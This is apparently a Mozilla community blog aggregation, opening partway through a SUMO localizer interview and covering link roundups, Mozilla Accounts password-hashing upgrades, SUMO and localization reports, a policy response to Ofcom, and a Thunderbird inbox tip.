As for the relationship with the Mozilla community, the most memorable experience was undoubtedly my participation in the Europe MozCamp 2009 in Prague, my “first time”, my first meeting with so many people who then became dear friends, not only in the virtual world. I remember being very excited about that invitation and fearful for my English, which was and is certainly not the best. An episode: Prague, the first Mozilla talk I attended. I was trying to understand as much as possible what the speaker was saying in English. I heard this strange word “eltenen… eltenen… eltenen” repeated several times. What did it mean? After a while I couldn’t take it anymore, I turned to an Italian friend who was more expert in the topics discussed and above all who knew the English language well. Q: What the hell does “eltenen” mean? A: “Localization”. Q: “Localization???” A: “l10n… L ten n… L ocalizatio n”. Silence, embarrassment, damn acronyms!

How could I forget my first trip outside of Europe to attend the Mozilla Summit in Whistler, Canada in the summer of 2010? It was awesome, I was much more relaxed, decided not to think about the English language barrier and was able to really contribute to the discussions that we, SUMO localizers and contributors from so many countries around the world, were having to talk about our experience, try to fix the translation platform to make it better for us and discuss all the potential issues that Firefox was having at the time. I really talked a lot and I think the “Mozillians” I interacted with even managed to understand what I was saying in English :)

The subsequent meetings, the other All Hands I attended, were all a great source of enthusiasm and energy! I met some really amazing people!

Q: Lastly, can you share tips for those who are interested in contributing to Italian content localization or contributing to SUMO in general?

Every time a new localizer starts collaborating with us I don’t forget all the help I received years ago! I bend over backwards to put them at ease, to guide them in their first steps and to be able to transmit to them the same passion that was transmitted to me by those who had to review with infinite patience my first efforts as a localizer. So I would say: first of all, you must have passion and a desire to help people. If you came to us it’s probably because you believe in this project, in this way of helping people. You can know the language you are translating from very well, but if you are not driven by enthusiasm everything becomes more difficult and boring. Don’t be afraid to make mistakes, if you don’t understand something ask, you’re among friends, among traveling companions. As long as an article is not published we can correct it whenever we want and even after publication. We were all beginners once and we are all here to learn. Take an article, start translating it and above all keep it updated.

If you are helping on the support forums, be kind and remember that many users are looking for help with a problem and often their problems are frustrating. The best thing to do is to help the user find the answer they are looking for. If a user is rude, don’t start a battle that is already lost. You are not obligated to respond, let the moderators intervene. It is not a question of wanting to be right at all costs but of common sense.

 

Don Martilinks for 29 Oct 2024

Satire Without Purpose Will Wander In Dark Places Broadly labelling the entirety of Warhammer 40,000 as satire is no longer sufficient to address what the game has become in the almost 40 years since its inception. It also fails to answer the rather awkward question of why, exactly, these fascists who are allegedly too stupid to understand satire are continually showing up in your satirical community in the first place.

Why I’m staying with Firefox for now – Michael Kjörling [T]he most reasonable option is to keep using Firefox, despite the flaws of the organization behind it. So far, at least these things can be disabled through settings (for example, their privacy-preserving ad measurement), and those settings can be prepared in advance.

Google accused of shadow campaigns redirecting antitrust scrutiny to Microsoft, Google’s Shadow Campaigns (so wait a minute, Microsoft won’t let companies use their existing Microsoft Windows licenses for VMs in the Google cloud, and Google is doing a sneaky advocacy campaign? Sounds like content marketing for Amazon Linux®)

Scripting News My friends at Automattic showed me how to turn on ActivityPub on a WordPress site. I wrote a test post in my simple WordPress editor, forgetting that it would be cross-posted to Mastodon. When I just checked in on Masto, there was the freaking post. After I recovered from passing out, I wondered what happens if I update the post in my editor, and save it to the WordPress site that’s hooked up to Masto via ActivityPub. So I made a change and saved it. I waited and waited, nothing happened. I got ready to add a comment saying ahh I guess it doesn’t update, when—it updated. (Like being happy when a new web site opens in a new browser, a good sign that ActivityPub is the connecting point for this kind of connected innovation.) Related: The Web Is a Customer Service Medium (Ftrain.com) by Paul Ford.

China Telecom’s next 150,000 servers will mostly use local processors Among China Telecom’s server buys this year are machines running processors from local champion Loongson, which has developed an architecture that blends elements of RISC-V and MIPS.

Removal of Russian coders spurs debate about Linux kernel’s politics Employees of companies on the Treasury Department’s Office of Foreign Assets Control list of Specially Designated Nationals and Blocked Persons (OFAC SDN), or connected to them, will have their collaborations subject to restrictions, and cannot be in the MAINTAINERS file.

The TikTokification of Social Media May Finally Be Its Undoing by Julia Angwin. If tech platforms are actively shaping our experiences, after all, maybe they should be held liable for creating experiences that damage our bodies, our children, our communities and our democracy.

Cheap Solar Panels Are Changing the World The latest global report from the International Energy Agency (IEA) notes that solar is on track to overtake all other forms of energy by 2033.

Conceptual models of space colonization - Charlie’s Diary (one more: Kurt Vonnegut’s concept for spreading genetic material)

(protip: you can always close your browser tabs with creepy tech news, there will be more in a few minutes… Location tracking of phones is out of control. Here’s how to fight back. LinkedIn fined $335 million in EU for tracking ads privacy breaches Pinterest faces EU privacy complaint over tracking ads Dems want tax prep firms charged for improper data sharing Dow Jones says Perplexity is “freeriding,” sues over copyright infringement You Have a ‘Work Number’ on This Site, and You Should Freeze It Roblox stock falls after Hindenburg blasts the social gaming platform over bots and pedophiles)

It Was Ten Years Ago Today that David Rosenthal predicted that cryptocurrency networks will be dominated by a few, perhaps just one, large participant.

Writing Projects (good start for a checklist before turning in a writing project. Maybe I should write Git hooks for these.)

Word.(s). (Includes some good vintage car ads. Remember when most car ads were about the car, not just buttering up the driver with how successful you must be to afford this thing?)

Social Distance and the Patent System [I]t was clear from our conversation that [Judge Paul] Michel doesn’t have a very deep understanding of the concerns of many in the software industry. And, more to the point, he clearly wasn’t very interested in understanding those concerns better or addressing them. On a theoretical level, he knew that there was a lot of litigation in the software industry and that a lot of people were upset about it. But like Fed and the unemployment rate, this kind of theoretical knowledge doesn’t always create a sense of urgency. One has to imagine that if people close to Michel—say, a son who was trying to start a software company—were regularly getting hit by frivolous patent lawsuits, he would suddenly take the issue more seriously. But successful software entrepreneurs are a small fraction of the population, and most likely no judges of the Federal Circuit have close relationships with one.

(Rapids is the script that gathers these, and it got a clean bill of health from the feed reader score report after I fixed the Last-Modified/If-Modified-Since and Etag handling. So expect more link dump posts here, I guess.)

Wil ClouserMozilla Accounts password hashing upgrades

We’ve recently finished two significant changes to how Mozilla Accounts handles password hashes which will improve security and increase flexibility around changing emails. The changes are entirely transparent to end-users and are applied automatically when someone logs in.

Randomizing Salts

If a system is going to store passwords, best practice is to hash the password with a unique salt per row. When accounts was first built, we used an account’s email address as the unique salt for password hashing. This saved a column in the database and some bandwidth, but overall I think it was a poor idea. It meant people couldn’t re-use their email addresses and it left PII sitting around unnecessarily.

Instead, a better idea is just to generate a random salt. We’ve now transitioned Mozilla Accounts to random salts.

Increasing Key Stretching Iterations

Eight years ago, Ryan Kelly filed bug 1320222 to review Mozilla Accounts’ client-side key stretching capabilities and sparked a spirited conversation about iterations and the priority of the bug. Overall, this is routine maintenance - we expect any amount of stretching we do will have to be revisited periodically as hardware improves, and the value we choose is a compromise between security and time to log in, particularly on older hardware.

Since we were already generating new hashes for the random salts, we took the opportunity to increase our PBKDF2 iterations from 1,000 to 650,000 – a number we’re seeing others in the industry using. This means logging in with slower hardware (like older mobile phones) may be noticeably slower. Below is an excerpt from the analysis we did, showing that a MacBook from 2007 will take an additional ~3 seconds to log in:

Key Stretch Iterations Overhead on 2007 Macbook Overhead on 2021 MacBook Pro M1
100,000 0.4800024 seconds 0.00000681 seconds
200,000 0.9581234 seconds 0.00000169 seconds
300,000 1.4539928 seconds 0.00000277 seconds
400,000 1.9337903 seconds 0.00029750 seconds
500,000 2.4146366 seconds 0.00079127 seconds
600,000 2.9482827 seconds 0.00112186 seconds
700,000 3.3960513 seconds 0.00117956 seconds
800,000 3.8675677 seconds 0.00117956 seconds
900,000 4.3614942 seconds 0.00141616 seconds
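
To make the two changes concrete, here is a minimal sketch of deriving a hash with a per-account random salt and 650,000 PBKDF2 iterations, using Node’s built-in crypto module; the digest and key length are assumptions for illustration, not the exact parameters Mozilla Accounts uses.

const crypto = require("crypto");

function hashPassword(password) {
  // random per-account salt instead of reusing the email address
  const salt = crypto.randomBytes(32);
  // key stretching: 650,000 PBKDF2 iterations (digest and length assumed)
  const hash = crypto.pbkdf2Sync(password, salt, 650000, 32, "sha256");
  return { salt: salt.toString("hex"), hash: hash.toString("hex") };
}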

Implementation

Dan Schomburg did the heavy lifting to make this a smooth and successful project. He built the v2 system alongside v1, so both hashes are generated simultaneously, and if the v2 hash exists the login system will use it. This lets us roll the feature out slowly and gives us control if we need to disable it or roll back.
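
In sketch form, the login path described here might look roughly like the following; the helper names are hypothetical, not the actual accounts code.

async function verifyPassword(account, password) {
  if (account.v2Hash) {
    // prefer the new random-salt hash whenever it exists
    return checkV2Hash(account, password);
  }
  const ok = await checkV1Hash(account, password);
  if (ok) {
    // generate and store the v2 hash alongside v1 on a successful login
    await storeV2Hash(account, password);
  }
  return ok;
}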

We tested the code for several months on our staging server before rolling it out in production. When we did enable it in production it was over the course of several weeks via small percentages while we watched for unintended side-effects and bug reports.

I’m pleased to say everything appears to be working smoothly. As always, if you notice any issues, please let us know.

Don Martitypefaces that aren’t on this blog (yet?)

Right now I’m not using these, but they look useful and/or fun.

  • Departure Mono: vintage-looking, pixelated, lo-fi technical vibe.

  • Atkinson Hyperlegible Font was carefully developed by the Braille Institute to help low-vision readers. It improves legibility and readability through clear and distinctive letters and numbers.

I’m trying to keep this site fairly small and fast, so I’m getting by with Modern Font Stacks as much as possible.

Related

colophon

Bonus links

(these are all web development, editing, and business, more or less. Yes, I’m still working on my SCALE proposal, deadline coming up.)

Before you buy a domain name, first check to see if it’s haunted

Discover Wiped Out MFA Spend By Following These Four Basic Steps (This headline underrates the content. If all web advertisers did these tips, then 90% of the evil stuff on the Internet would be gone—most of the web’s problems are funded by advertisers and agencies who fail to pay attention to the context in which their ads appear.)

Janky remote backups without root on the far end

My solar-powered and self-hosted website

Let’s bring back browsing

Hell Gate NYC doubled its subscription revenue in its second year as a worker-owned news outlet

Is Matt Mullenweg defending WordPress or sabotaging it?

Gosub – An open-source browser engine

Take that

Thunderbird Android client is K-9 Mail reborn, and it’s in solid beta

A Bicycle for the Mind – Prologue

Why I Migrated My Newsletter From Substack to Eleventy and Buttondown - Richard MacManus

My Blog Engine is the Erlang Build Tool

A Developer’s Guide to ActivityPub and the Fediverse

Don Martipersonal AI in the rugpull economy

Doc Searls writes, in Personal Agentic AI,

Wouldn’t it be good for corporate AI agents to have customer hands to shake that are also equipped with agentic AI? Wouldn’t those customers be better than ones whose agency is merely human, and limited to only what corporate AI agents allow?

The obvious answer for business decision-makers today is: lol, no, a locked-in customer is worth more. If, as a person who likes to watch TV, you had an AI agent, then the agent could keep track of sports seasons and the availability of movies and TV shows, and turn your streaming subscriptions on and off. In the streaming business, like many others, the management consensus is to make things as hard and manual as possible on the customer side, and save the automation for the company side. Just keeping up with watching a National Football League team is hard…even for someone who is ON the team. Automation asymmetry, where the seller gets to reduce service costs while the customer has to do more and more manual work, is seen as a big win by the decision-makers on the high-automation side.

Big company decision-makers don’t want to let smaller companies have their own agentic tools, either. Getting a DMCA Exemption to let McDonald’s franchisees fix their ice cream machines was a big deal that required a lengthy process with the US Copyright Office. Many other small businesses are locked in to the manual, low-information side of a business relationship with a larger one. (Web advertising is another example. Google shoots at everyone’s feet, and agencies, smaller firms, and browser extension developers dance.) Google employees and shareholders would be better off if it were split into two companies that could focus on useful projects for independent customers who had real choices.

The first wave of user reactions to AI is happening, and it’s adversarial. Artists on sites like DeviantArt went first, and now Reddit users are deliberately posting fake answers to feed Google’s AI. On the shopping side, avoiding the output of AI and made-for-AI deceptive crap is becoming a must-have mainstream skill, as covered in How to find helpful content in a sea of made-for-Google BS and How Apple and Microsoft’s trusted brands are being used to scam you. As Baldur Bjarnason writes,

The public has for a while now switched to using AI as a negative—using the term artificial much as you do with artificial flavouring or that smile’s artificial. It’s insincere creativity or deceptive intelligence.

Other news is even worse. In today’s global conflict between evil oligarchs and everyone else, AI is firmly aligned with the evil oligarch side.

But today’s Big AI situation won’t last. Small-scale and underground AI has sustainable advantages over the huge but money-losing contenders. And it sounds like Doc is already thinking post-bubble.

Adversarial now, but what about later?

So how do we get from the AI adversarial situation we have now to the win-win that Doc is looking for? Part of the answer will be resolving the legal issues. Today’s Napster-like free-for-all environment won’t persist, so eventually we will have an AI scene in which companies that want to use your work for training have to get permission and disclose provenance.

The other part of the path from today’s situation—where big companies have AI that enables scam culture and chickenization while individuals and small companies are stuck rowing through funnels and pipelines—is personal, aligned AI that balances automation asymmetries. Whether it’s solving CAPTCHAs, getting data in hard-to-parse formats, or other awkward mazes, automation asymmetries mean that as a customer, you technically have more optionality than you practically have time to use. But AI has a lot more time. If a company gives you user experience grief, with the right tools you can get back to where you would have been if they had applied less obfuscation in the first place. (icymi: Video scraping: extracting JSON data from a 35 second screen capture for less than 1/10th of a cent. Not a deliberate obfuscation example, but an approach that can be applied.)

So we’re going to see something like this AI cartoon by Tom Fishburne (thanks to Doc for the link) for privacy labour. Companies are already getting expensive software-as-a-service to make privacy tasks harder for the customers, which means that customers are going to get AI services to make it easier. Eventually some companies will notice the extra layers, pay attention to the research, and get rid of the excess grief on their end so you can stop running de-obfuscation on your end. That will make it work better for everyone. (GPC all the things! Data Rights Protocol)

The biggest win from personal AI will, strangely enough, be in de-personalizing your personal information environment. By doing the privacy labour for you, the agentic AI will limit your addressability and reduce personalization risks. The risks to me from buying the less suitable of two legit brands are much lower than the risk of getting stuck with some awful crap that was personalized to me and not picked up on by norms enforcers like Consumer Reports. Getting more of my privacy labour done for me will not just help me personally do better #mindfulConsumption, but also increase the rewards for win-win moves by sellers. Personalization might be nifty, but filtering out crap and rip-offs is a bigger immediate win: Sunday Internet optimism. Doc writes, “When you limit what customers can bring to markets, you limit what can happen in those markets.” As far as I can tell, the real promise for agentic AI isn’t just in enabling existing processes or making them more efficient. It’s in establishing a credible deterrent to enshittification—if you’re trying to rip me off, don’t talk to me, talk to my bot army.

For just a minute, put yourself in the shoes of a product manager with a proposal for some legit project that they’re trying to get approved. If that proposal is up against a quick win for the company, like one based on creepy surveillance, it’s going to lose. But if the customers have the automation power to lower the ROI from creepy growth hacking, the legit project has a chance. And that pushes up the long-term value of the entire company. An individual locked-in customer is more valuable to the brand than an individual independent customer, but a brand with independent customers is more valuable than a brand with an equal number of locked-in customers.

Anyway, hope to see you at VRM Day.

Bonus links

Space is Dead. Why Do We Keep Writing About It?

It’s Time to Build the Exoplanet Telescope

The tech startups shaking up construction in Europe

Support.Mozilla.OrgWhat’s up with SUMO – Q3 2024

Each quarter, we gather insights on all things SUMO to celebrate our team’s contributions and showcase the impact of our work.

The SUMO community is powered by an ever-growing global network of contributors. We are so grateful for your contributions, which help us improve our product and support experiences, and further Mozilla’s mission to make the internet a better place for everyone.

This quarter we’re modifying our update to highlight key takeaways, outline focus areas for Q4, and share our plans to optimize our tools so we can measure the impact of your contributions more effectively.

Below you’ll find our report organized by the following sections: Q3 Highlights at-a-glance, an overview of our Q4 Priorities & Focus Areas, Contributor Spotlights and Important Dates, with a summary of special events and activities to look forward to! Let’s dive right in:

Q3 Highlights at-a-glance

Forums: We saw over 13,000 questions posted to SUMO in Q3, up 83% from Q2. The increased volume was largely driven by the navigation redesign in July.

  • We were able to respond to over 6,300 forum questions, a 49% increase from Q2!
  • Our average response time was ~15 hours, a one-hour improvement over Q2, with a helpfulness rating of 66%.
  • August was our busiest and most productive month this year. We saw more than 4,300 questions shared in the forum, and we were able to respond to 52.7% of total in-bounds.
  • Trends in forum queries included questions about site breakages, account and data recovery concerns, sync issues, and PPA feedback.

Knowledge Base: We saw 473 en-US revisions from 45 contributors, and more than 3,000 localization revisions from 128 contributors, which resulted in an overall helpfulness rating of 61%, our highest quarterly average rating YTD!

  • Our top contributor was AliceWyman. We appreciate your eagle eyes and dedication to finding opportunities to improve our resources.
  • For localization efforts, our top contributor was Michele Rodaro. We are grateful for your time, efforts and expert language skills.

Social: On our social channels, we interacted with over 1,100 tweets and saw more than 6,000 app reviews.

  • Our top contributor on Twitter this quarter was Isaac H who responded to over 200 tweets, expertly navigating our channels to share helpful resources, provide troubleshooting support, and help redirect feature requests to Mozilla Connect. Thank you, Isaac!
  • On the play store, our top contributor was Dmitry K who replied to over 400 reviews! Thank you for giving helpful feedback, advice and for providing such a warm and welcoming experience for users.

SUMO platform updates: There were 5 major platform updates in Q3. Our focus this quarter was to improve navigation for users by introducing new standardized topics across products, and update the forum moderation tool to allow our support agents to moderate these topics for forum posts. Categorizing questions more accurately with our new unified topics will provide us with a foundation for better data analysis and reporting.

We also introduced improvements to our messaging features, localized KB display times, fixed a bug affecting pageviews in the KB dashboard, and added a spam tag to make moderation work easier for the forum moderators.

We acknowledge the significant increase in spam questions that began in July, though the volume is now starting to trend downwards. We will continue to monitor the situation closely, and we are taking note of moderator recommendations for a future resolution. We appreciate your efforts to help us combat this problem!

Check out the SUMO Engineering Board to see what the platform team is cooking up in the engine room. You’re welcome to join our monthly Community Calls to learn more about the latest updates to Firefox and chat with the team.

Firefox Releases: We released Firefox 128, Firefox 129 and Firefox 130 in Q3 and we made significant updates to our wiki template for the Firefox train release.

Q4 Priorities & Focus Areas

  • CX: Enhancing the user experience and streamlining support operations.
  • Kitsune: Improved article helpfulness survey and tagging improvements to help with more granular content categorization.
  • SUMO: For the rest of 2024, we’re working on an internal SUMO Community Report, FOSDEM 2025 preparation, Firefox 20th anniversary celebration, and preparing for an upcoming Community Campaign around QA.

Contributor Spotlights

We have seen 37 new contributors this year, with 10 joining the team this quarter. Among them are ThePillenwerfer, Khalid, Mozilla-assistent, and hotr1pak, who shared more than 100 contributions between July and September. We appreciate your efforts!

Cheers to our top contributors this quarter:

SUMO top contributors in Q3

Our multi-channel contributors made a significant impact by supporting the community across more than one channel (and in some cases, all three!).

All in all it was an amazing quarter! Thanks for all you do.

Important dates

  • October 29th: Firefox 132 will be released
  • October 30th: RSVP to join our next Community Call! All are welcome. We do our best to create a safe space for everyone to contribute. You can join on video or audio, at your discretion. You are also welcome to share questions in advance via the contributor forum, or our Matrix channel.
  • November 9th: Firefox’s 20th Birthday!
  • November 14th: Save the date for an AMA with the Firefox leadership team
  • FOSDEM ’25: Stay tuned! We’ll put a call out for volunteers and for talks in early November

Stay connected

Thanks for reading! If you have any feedback or recommendations on future features for this update, please reach out to Kiki and Andrea.

Mozilla Localization (L10N)L10n report: October 2024 Edition

Please note that some of the information in this report may change, as we are sometimes sharing details about projects that are still in early stages and not yet final.

New community/locales added

We’re grateful for the Abkhaz community’s initiative in reaching out to localize our products. Thank you for your valuable involvement!

New content and projects

What’s new or coming up in Firefox desktop

Search Mode Switcher

A new feature in development has become available (behind a flag) with the release of the latest Nightly, version 133: the Search Mode Switcher. You may have already seen strings for this land in Pontoon. In short, the feature lets you enter a search term into the address bar and search with multiple engines. After entering the search term and selecting a provider, the search term persists (instead of being replaced by the site’s URL), and you can then select a different provider by clicking an icon on the left of the bar.

Firefox Search Mode Switcher

You can test this now in version 133 of Nightly: enter about:config in the address bar, press Enter, proceed past the warning, and search for the following flag: browser.urlbar.scotchBonnet.enableOverride. Toggling the flag to true enables the feature.
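If you prefer to enable the flag outside of the about:config UI (for example, so a dedicated testing profile always starts with it switched on), a single user_pref line in that profile’s user.js file should have the same effect. This is a minimal sketch, assuming the standard Firefox profile layout; the pref only takes effect on Nightly builds that include the feature:

    // user.js in your Nightly profile folder: enables the Search Mode Switcher on startup
    user_pref("browser.urlbar.scotchBonnet.enableOverride", true);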

New profile selector

Starting in version 134 of Nightly, a new feature for easily selecting, creating, and changing profiles within Firefox will begin rolling out to a small number of users worldwide. Strings are planned to be made available for localization soon.

Sidebar and Vertical Tabs

Finally, as mentioned in the previous L10n report, features for a new sidebar with expanded functionality, along with the ability to change your tab layout from horizontal to vertical, are available to test in Nightly through the Firefox Labs feature in your settings. Just go to your Nightly settings, select the Firefox Labs section from the left, and enable the feature by clicking the checkbox. Since these are experimental, there may continue to be occasional string changes or additions. While you check out these features in your languages, if you have thoughts on the features themselves, we welcome you to share feedback through Mozilla Connect.

What’s new or coming up in web projects

AMO and AMO Frontend

To improve user experience, the AMO team plans to implement changes that will enable only locales meeting a specific completion threshold. Locales with very low completion percentages will be disabled in production but will remain available on Pontoon for teams to continue working on them. The exact details and timeline will be communicated once the plan is finalized.

Mozilla Accounts

Mozilla Accounts is currently going through a redesign of the user experience of some of its login pages, so we will continue to see small updates here and there for the rest of the year. There is also a planned update to the Mozilla Accounts payment sub-platform. We expect a new file to be added to the project before the end of the year, but a large number of the strings will be the same as they are now. We will migrate those translations so they don’t need to be translated again, though there will also be a number of new strings.

Mozilla.org

The Mozilla.org site is undergoing a series of redesigns, starting with updates to the footer and navigation bars. These changes will continue through the rest of the year and beyond. The next update will focus on the About page. Additionally, the team is systematically removing obsolete strings and replacing them with updated or new strings, ensuring you have enough time to catch up while minimizing effort on outdated content.

A few new Welcome pages have been made available to a select few locales. Each of these pages has a different deadline, so make sure to complete them before they are due.

What’s new or coming up in SUMO

The SUMO platform received a navigation redesign in July to improve navigation for users and contributors. The team also introduced new topics that are standardized across products, which lay the foundation for better data analysis and reporting. Most of the old topics, and their associated articles and questions, have been mapped to the new taxonomy, but a few remain that will be manually mapped to their new topics.

On the community side, we also introduced improvements and fixes to the messaging feature, changed the KB display time to a locale-appropriate format, fixed a bug so that pageview numbers display properly in the KB dashboard, and added a spam tag to questions marked as spam in the question list to make moderation work easier for the forum moderators.

There will be a community call on Oct 30 at 5pm UTC, where we will be talking about the Firefox 20th anniversary celebration and the Firefox 132 release. Check out the agenda for more details.

What’s new or coming up in Pontoon

Enhancements to Pontoon Search

We’re excited to announce that Pontoon now allows for more sophisticated searches for strings, thanks to the addition of the new search panel!

When searching for a string, clicking on the magnifying glass icon will open a dropdown, allowing users to select any combination of search options to help refine their search. Please note that the default search behavior has changed, as string identifiers must now be explicitly enabled in search options.

Pontoon Enhanced Search Options

User status banners

As part of the effort to introduce badges/achievements into Pontoon, we’ve added status banners under user avatars in the translation workspace. Status banners reflect the permissions of the user within the respective locale and project, eliminating the need to visit their profile page to view their role.

Namely, team managers will get the ‘MNGR’ tag, translators get the ‘TRNSL’ tag, project managers get the ‘PM’ tag, and those with site-wide admin permissions receive the ‘ADMIN’ tag. Users who have joined within the last three months will get the ‘NEW USER’ tag for their banner. Status banners also appear in comments made under translations.

Screenshot of Pontoon showing the Translate UI, with a user displaying the new banner for Manager and Admin

New Pontoon logo

We hope you love the new Pontoon logo as much as we do! Thanks to all of you who expressed your preference by participating in the survey.

Pontoon New Logo

Friends of the Lion

Know someone in your l10n community who’s been doing a great job and should appear here? Contact us and we’ll make sure they get a shout-out!

Useful Links

Questions? Want to get involved?

If you want to get involved, or have any questions about l10n, reach out to:

Did you enjoy reading this report? Let us know how we can improve it.

Mozilla Privacy BlogMozilla Responds to Ofcom’s Draft Transparency Reporting Guidance

On 4 October 2024, Mozilla provided input to Ofcom’s consultation on its draft transparency reporting guidance. Transparency plays a crucial role in promoting accountability and public trust, particularly when it comes to how tech platforms handle harmful or illegal content online, and we were pleased to share our research, insights, and input with Ofcom.

Scope of the Consultation

Ofcom’s proposed guidance aims to improve transparency reporting, allowing the public, researchers, and regulators to better understand how categorized services operate and whether they are doing enough to respect users’ rights and protect users from harm.

We support this effort, and we believe additional clarifications are needed to ensure that Ofcom’s transparency process fully meets its objectives: holding tech companies accountable, safeguarding users, fostering public trust, and enabling different stakeholders to make effective use of transparency reports.

The Importance of Standardization

One of our key recommendations is the need for greater standardization in transparency elements. Mozilla’s research on public ad repositories developed by many of the largest online platforms finds that there are large discrepancies across these transparency tools, making it difficult for researchers and regulators to compare information across platforms.

Ofcom’s guidance must ensure that transparency reports are clear, systematic, and easy to compare year-to-year. We recommend that Ofcom provide explicit guidelines on the specific data platforms must provide in their transparency reports and the formats in which they should be reported. This will enable platforms to comply uniformly and make it easier for regulators and researchers to monitor patterns over time.

In particular, we encourage Ofcom to distinguish between ‘core’ and ‘thematic’ information in transparency reports. We understand that core information will be required consistently every year, while thematic data will focus on specific regulatory priorities, such as emerging areas of concern. However, it is important that platforms are given enough advance notice to prepare their systems for thematic information, to avoid any disproportionate compliance burden. This is particularly important for smaller businesses, which have limited resources and may find it more challenging than big tech companies to comply with new reporting criteria.

We also recommend that data about content engagement and account growth should be considered ‘core’ information that needs to be collected and reported on a regular basis. This data is essential for monitoring civic discourse and election integrity.

Engaging a Broader Range of Stakeholders

Mozilla also believes that a broad range of stakeholders should be involved in shaping and reviewing transparency reporting. Ofcom’s consultative approach with service providers is commendable.  We encourage further expansion of this engagement to include stakeholders such as researchers, civil society organizations, and end-users.

Based on our extensive research, we recommend “transparency delegates.” Transparency delegates are experts who can act as intermediaries between platforms and the public, by using their expertise to evaluate platforms’ transparency in a particular area (for example, AI) and to convey relevant information to a wider audience. This could help ensure that transparency reports are accessible and useful to a range of audiences, from policymakers to everyday users who may not have the technical expertise to interpret complex data.

Enhancing Data Access for Researchers

Transparency reports alone are not enough to ensure accountability. Mozilla emphasizes the importance of giving independent researchers access to platform data. In our view, data access is not just a tool for academic inquiry but a key component of public accountability. Ofcom should explore mechanisms for providing researchers with access to data in a way that protects user privacy while allowing for independent scrutiny of platform practices.

This access is crucial for understanding how content moderation practices affect civic discourse, public safety, and individual rights online. Without it, we risk relying too heavily on self-reported data, which can be inconsistent or incomplete.  Multiple layers of transparency are needed, in order to build trust in the quality of platform transparency disclosures.

Aligning with Other Regulatory Frameworks

Finally, we encourage Ofcom to align its transparency requirements with those set out in other major regulatory frameworks, particularly the EU’s Digital Services Act (DSA). Harmonization will help reduce the compliance burden on platforms and allow users and researchers to compare transparency reports more easily across jurisdictions.

Mozilla looks forward to continuing our work with Ofcom and other stakeholders to create a more transparent and accountable online ecosystem.

The post Mozilla Responds to Ofcom’s Draft Transparency Reporting Guidance appeared first on Open Policy & Advocacy.

Mozilla ThunderbirdMaximize Your Day: Focus Your Inbox with ‘Grouped by Sort’

For me, staying on top of my inbox has always seemed like an unattainable goal. I’m not an organized person by nature. Periodic and severe email anxiety (thanks, grad school!) often meant my inbox was in the quadruple digits (!).

Lately, something’s shifted. Maybe it’s working here, where people care a lot about making email work for you. These past few months, my inbox has stayed, if not manageable, then pretty close to it. I’ve only been here a year, which has made this an easier goal to reach. Treating my email like laundry is definitely helping!

But how do you get a handle on your inbox when it feels out of control? R.L. Dane, one of our fans on Mastodon, reminded us Thunderbird has a powerful, built-in tool that can help: the ‘Grouped by Sort’ feature!

Email Management for All Brains

For those of us who are neurodiverse, email management can be a challenge. Each message that arrives in your inbox, even without a notification ding or popup, is a potential distraction. An email can contain a new task for your already busy to-do list. Or one email can lead you down a rabbit hole while other emails pile up around it. Eventually, those emails we haven’t archived, replied to, or otherwise processed take on a life of their own.

Staring at an overgrown inbox isn’t fun for anyone. It’s especially overwhelming for those of us who struggle with executive function – the skills that help us focus, plan, and organize. A full or overfull inbox doesn’t seem like a hurdle we can overcome. We feel frozen, unsure where to even begin tackling it, and while we’re stuck trying to figure out what to do, new emails keep coming. Avoiding our inboxes entirely starts to seem like the only option – even if this is the most counterproductive thing we can do.

So, how in the world do people like us dig out of our inboxes?

Feature for Focus: Grouped by Sort

We love seeing R.L. Dane’s regular Thunderbird tips, tricks, and hacks for productivity. In fact, he was the one who brought this feature to our attention in a Mastodon post! We were thrilled when we asked if we could turn it into a productivity post and got an excited “Yes!” in response.

As he pointed out, using Grouped by Sort, you can focus on more recently received emails. Sorting by Date, this feature will group your emails into the following collapsible categories:

  • Today
  • Yesterday
  • Last 7 Days
  • Last 14 Days
  • Older

Turning on Grouped by Sort is easy. Click the message list display options, then click ‘Sort by.’ In the top third of the menu, toggle the ‘Date’ option. In the middle third, select your preferred order, Descending or Ascending. Finally, in the bottom third, toggle ‘Grouped by Sort.’

Now you’re ready to whittle your way through an overflowing inbox, one group at a time.

And once you get down to a mostly empty and very manageable inbox, you’ll want to find strategies and habits to keep it there. Treating your email like laundry is a great place to start. We’d love to hear your favorite email management habits in the comments!

Resources

ADDitude Magazine: https://www.additudemag.com/addressing-e-mail/

Dixon Life Coaching: https://www.dixonlifecoaching.com/post/why-high-achievers-with-adhd-love-and-hate-their-email-inbox

The post Maximize Your Day: Focus Your Inbox with ‘Grouped by Sort’ appeared first on The Thunderbird Blog.